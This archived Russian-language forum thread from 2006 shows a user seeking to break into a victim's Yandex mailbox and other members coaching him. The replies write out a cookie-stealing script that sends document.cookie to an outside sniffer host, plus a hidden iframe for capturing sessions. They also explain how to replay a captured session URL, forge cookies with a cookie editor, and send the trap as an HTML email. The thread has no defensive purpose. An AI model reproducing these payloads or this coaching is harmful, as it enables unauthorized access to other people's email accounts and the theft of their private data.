Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Кукии (https://forum.antichat.xyz/showthread.php?t=20451)

Petr 13.06.2006 00:10

Кукии
 
Вопрос такой (знаю чт омного вопросы задаю, но я и почитал перед тем как задать)
как можн оукратсь куки для входа на почту жертвы?

Petr 13.06.2006 00:21

а есть способ по легче типа, отослать писмо с приклиплёными данными, а куки придут мне.
или как взломать комп жертвы?
я вобще писмо отослал с с картинкой и там синфер. и на мой синфер пришли данные.
тока что с нимим делать я не понял.

Cold_Zer0 13.06.2006 00:27

Теперь возми прогу CookieEditor и подделай куки.
Жаль не помню статей на эту тему...
Но со снифером ты всё сделал правильно(ну правильно, если это сработало), типа XSS что то получилось, а теперь возьми прогу которую я посоветовал выше и подделай куки!

+toxa+ 13.06.2006 00:33

Есть такая вещь как Xss.... в основном она используется для кражи кук... юзай поиск...

Petr 13.06.2006 00:36

спасибо за ответы,
Я скачал прогу но я что то не понял как в ней поделовать куки,
можеш мне в аску постучатся пожалуйсто.

Petr 13.06.2006 00:41

А то что я со снифером делала не то получается?

Гаврила 13.06.2006 00:50

Какую почту ломаешь хоть?
Ну раз пришли куки,вставляй в адресную строку.
Скорей всего пришли не куки,а сессия.

bul.666 13.06.2006 01:01

Покопайся в видео! Какой сервер? Юзай сниффер! Зайди сюды http://antichat.ru/sniff/

Petr 13.06.2006 01:09

так я уже поюзал! и пришла именно сесия, но как её использовать? в адресну вставляю говарит логи пиши и пароль , сервер яндекс.

Гаврила 13.06.2006 01:13

Куки в студию.
Либо не то пришло,либо жертва нажала на кнопачку выход,после пользования ящиком.
И сессия погибла...

bul.666 13.06.2006 01:20

Может там проверка по Ip

Petr 13.06.2006 14:56

Да она начала на конопочку однозначно

вот что мне пришло

IP: 194.126.101.133 Real IP: 213.35.139.81
QUERY: ;
REFERER: http://simg.mail.yandex.net/simg/s.g...995d4d205f714a
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

bul.666 13.06.2006 16:21

Игиде здесь сессия?!!!

Sn@k3 13.06.2006 16:27

что стоит в строке, а точнее после слова QUERY, то это тебе и надо. ).зайди на video.antichat.ru , там просто ПОЛНО этого.

bul.666 13.06.2006 16:35

В query обычно передаются данные после snif.jpg?[QUERY]/// Тут обычно бывают кукии. Но не сессия!

Покажи нам как ты отправлял сниффер!

Petr 13.06.2006 16:40

я сделал все как в теме угон сесии яндекс.

Petr 13.06.2006 16:44

тока что посмотрел это видио, и хотел спросить а этот хтмл код где можно взять?
http://video.antichat.ru/file51.html

bul.666 13.06.2006 16:50

Какой код?! Как вставлять снифер?!

Petr 13.06.2006 16:54

ну да

bul.666 13.06.2006 17:03

<iframe src="адрес сниффера" width=0 height=0>#</iframe> - Это для сессии...

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Это для КУКИСОВ!

Ты должен отправлять письма в формате HTML

Petr 13.06.2006 17:31

А если в фото (ерзе блокнот) прописать, то не получится?

bul.666 13.06.2006 17:33

Всмысле?

Petr 13.06.2006 17:36

открыть фото через болокнот туда это вписать, а потом когда получатель откроет на снифер придут данные, так можно? вереня это будет работать?

Petr 13.06.2006 17:38

всё щяс проверил, не работает
тогда скажи а в яндексе как можно в виде html посылать?

Я там когда посылаю вроде как выбрав с форматирование хтмл
а когда псимо приход видет это всё как текст
кароч ты можеш послать мне правельно на почту gh266@yandex.ru
а мой снифер http://antichat.org/s/266.gif

буду блогодарен.

bul.666 13.06.2006 17:49

Вообще при регистрации ты выбираешь формат писем! И посмотри в насройках "Персональные данные"... Но это помойму на прием! Хотя хз. Я им яндексом не юзаюсь

Гаврила 13.06.2006 19:06

Цитата:

Сообщение от Sandjuro
открыть фото через болокнот туда это вписать, а потом когда получатель откроет на снифер придут данные, так можно? вереня это будет работать?

Всё будет работать.
Перед тем как спрашивать,пробуй всё на себе,много вопросов отпадёт.
Пришли сам себе картинку.Потом иди на сниффер,забирай строку REFERER и вставляй её в адресную строку.Попадёш в свой ящик.
Условия:
Жертва не должна нажать кнопку выход.
При входе в ящик у жертвы должна стоять галка в поле "не спрашивать две недели"
Ну и много разных ньюансов,типа привязка IP и т.д.
Так что всё зависит от степени ламеризма и лени жертвы.

Petr 14.06.2006 00:13

Не, если стока условий то снифер однозначно отподает. я себе пробовал, ну нечего не получилось просто.
а кроме брутус больше не остатется способов ломать ящики?

nc.STRIEM 14.06.2006 01:15

Цитата:

Сообщение от bul.666
<iframe src="адрес сниффера" width=0 height=0>#</iframe> - Это для сессии...

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> Это для КУКИСОВ!

Ты должен отправлять письма в формате HTML

А эта шняга на mail.ru работает??? Я пробовал, не получилось... Есле скрипт посылать, то его блокирует, а есле картинку, то ничего не происходит....

Гаврила 14.06.2006 01:18

Способов куча. http://forum.antichat.ru/thread9930.html
Но если у тебя на своём ящике не получилось,то тяжко будет чужой ломать.


Время: 09:05